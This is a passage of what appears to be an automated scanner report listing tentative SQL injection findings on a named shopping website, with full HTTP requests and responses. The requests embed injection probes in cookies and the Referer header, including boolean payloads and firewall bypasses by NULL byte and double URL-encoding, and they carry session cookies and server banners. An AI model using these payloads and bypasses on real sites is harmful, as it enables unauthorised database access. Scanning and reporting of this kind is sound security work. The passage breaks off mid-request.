Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:24 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:24 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:24 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:24 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497684228~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:41:24 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.13. http://www.skymall.com/shopping/dept.htm [source cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The source cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E'; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:39:33 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E''; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:39:34 GMT
Connection: close
Set-Cookie: JSESSIONID=A53901A3614D3B36F024541E49662E40.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497574000~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:39:34 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.14. http://www.skymall.com/shopping/detail.htm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/detail.htm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shopping/detail.htm?pid=203458153&c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152%20and%201%3d1--%20; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496224477; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494424475&t4=1303494352911&lti=1303494424474&ln=Log%20Racks&hr=/shopping/detail.htm%3Fpid%3D203458153%26c%3D10500%26cm_sp%3DFeaturedProduct-_-DeptPage-_-Log%20Racks&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:29:53 GMT
Connection: close
Set-Cookie: JSESSIONID=D891A6A4F3C72232936DBC22695747D4.plutov5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:29:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:29:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:29:53 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:29:53 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303496992825~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:29:53 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 18:29:53 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:29:53 GMT
Content-Length: 191817




<!--includes code start-->






































<!--includes code end-->
<!--header values start-->




<!--header values end-->

<!--searchengine code start-->
<!--searchengine code end-->
<!--ssl start-->
<!--ssl end-->
<html>
   <head>
       <!-- mp_trans_disable_start --><title>Log Racks | Outdoor Living | SkyMall</title><!-- mp_trans_disable_end -->
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <meta content="skymall.com name=author">
       <meta content="Copyright &copy; 2011 SkyMall, Inc. All right reserved." name="copyright">
       <meta content="www.objectinnovation.com" name="designer">
       <!-- mp_trans_disable_start -->
       <meta content="online shopping, shopping, gifts, catalog sales" name="classification">
       <meta content="LOG, RACKS, GIMP376, IMPROVEMENTS" name="keywords">
       <meta content="Log Racks from Improvements: Find Log Racks at SkyMall: " name="description">
       <!-- mp_trans_disable_end -->
       <link rel="stylesheet" type="text/css" href="/shopping/styles/styles.css">
       <link rel="stylesheet" type="text/css" href="/shopping/styles/TopNavMenuStyle.css">
       <link rel="stylesheet" type="text/css" href="/shopping/styles/AutoComplete.css">
       <script type="text/javascript" language="javascript" src="
...[SNIP]...

Request 2

GET /shopping/detail.htm?pid=203458153&c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152%20and%201%3d2--%20; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496224477; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494424475&t4=1303494352911&lti=1303494424474&ln=Log%20Racks&hr=/shopping/detail.htm%3Fpid%3D203458153%26c%3D10500%26cm_sp%3DFeaturedProduct-_-DeptPage-_-Log%20Racks&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:29:54 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1"><tr valign="top" bgcolor="#FBFFDF"align="Left"><td><STRONG>Error</STRONG></td></tr><tr valign="top" bgcolor="#FFFFFF"><td>This page can't be displayed due to a security violation. Contact support for additional information.<br>The incident ID is: 2759180419420659284.</td></tr></table></td></tr></table></body></html>

1.15. http://www.skymall.com/shopping/subdept.htm [90043274_clogin cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The 90043274_clogin cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 90043274_clogin cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997%00'; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:28:27 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997%00''; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:28:30 GMT
Connection: close
Set-Cookie: JSESSIONID=522DC8A4328BFB637085A244C410CCA2.menthuv5web; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:28:27 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:28:27 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:28:30 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:28:30 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303496907321~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:28:30 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:28:30 GMT
Content-Length: 212901


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.16. http://www.skymall.com/shopping/subdept.htm [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:32:52 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:32:54 GMT
Connection: close
Set-Cookie: JSESSIONID=7563D932BE75027B53B90871E12DC86C.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:32:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:32:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:32:54 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:32:54 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497172977~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:32:54 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:32:54 GMT
Content-Length: 212904


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.17. http://www.skymall.com/shopping/subdept.htm [partner cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The partner cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the partner cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the partner cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING%2527; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:25:33 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
